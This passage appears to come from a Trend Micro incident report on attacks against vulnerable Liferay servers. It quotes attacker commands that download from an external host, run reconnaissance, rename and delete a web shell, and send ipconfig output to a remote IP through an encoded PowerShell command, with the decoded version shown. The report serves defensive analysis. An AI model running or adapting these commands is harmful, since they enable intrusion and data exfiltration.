Trend Micro -
Both servers are using Liferay CE version 6.2, which is vulnerable to CVE-2020-7961 (possibly leading to remote code execution).
Incident # 2
Similar to the first incident, the malicious actor accesses the server via a web shell and then starts to gather basic information on the system. However, the second incident used PowerShell for different post-exploitation activities.
Our analysis shows that a Wget request was sent to a URL with a high numbered port. Unfortunately, we don’t have information as to what was downloaded since the URL was already dead by the time of analysis.
“C:WindowsSystem32cmd.exe” /c powershell wget http://209.14.0[.]234:56138/iMCRufG79yXvYjH0W1SK
The following commands were executed in order to gather basic system information:
cmd.exe /c ipconfig cmd.exe /c dir “c:windowssystem32cmd.exe” /c ping -n 1 google.com “c:windowssystem32cmd.exe” /c whoami
The web shell was then copied and the original entry deleted using the following commands:
cmd.exe /c ren C:inetpubwwwrootaspnet_clienterrorFF.aspx.req errorFF.aspx “c:windowssystem32cmd.exe” /c del “C:Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyowaautherrorFF.aspx.req”
The ipconfig command was executed as an argument for a wget request.
The following code shows the Powershell-encoded (top) and decoded (bottom) commands:
“c:windowssystem32cmd.exe” /c powershell.exe -exec bypass -enc JAByAD0AaQBwAGMAbwBuAGYAaQBnACAALwBhAGwAbAAgAHwAIABvAHUAdAAtAHMAdAByAGkAbgBnADsAdwBnAGUAdAAgAC0AVQByAGkAIABoAHQAdABwADoALwAvADkAMQAuADkAMgAuADEAMwA2AC4AMgA1ADAAOgA0ADQAMwA/AFMAZABmAGEAPQBmAGQAcwBzAGQAYQBkAHMAZgBzAGYAYQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBCAG8AZAB5ACAAJAByACAALQBDAG8AbgB0AGUAbgB0AFQAeQBwAGUAIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAG8AYwB0AGUAdAAtAHMAdAByAGUAYQBtACIA
$r=ipconfig /all | out-string;wget -Uri http://18.104.22.168:443?Sdfa=fdssdadsfsfa -Method Post -Body $r -ContentType “application/octet-stream”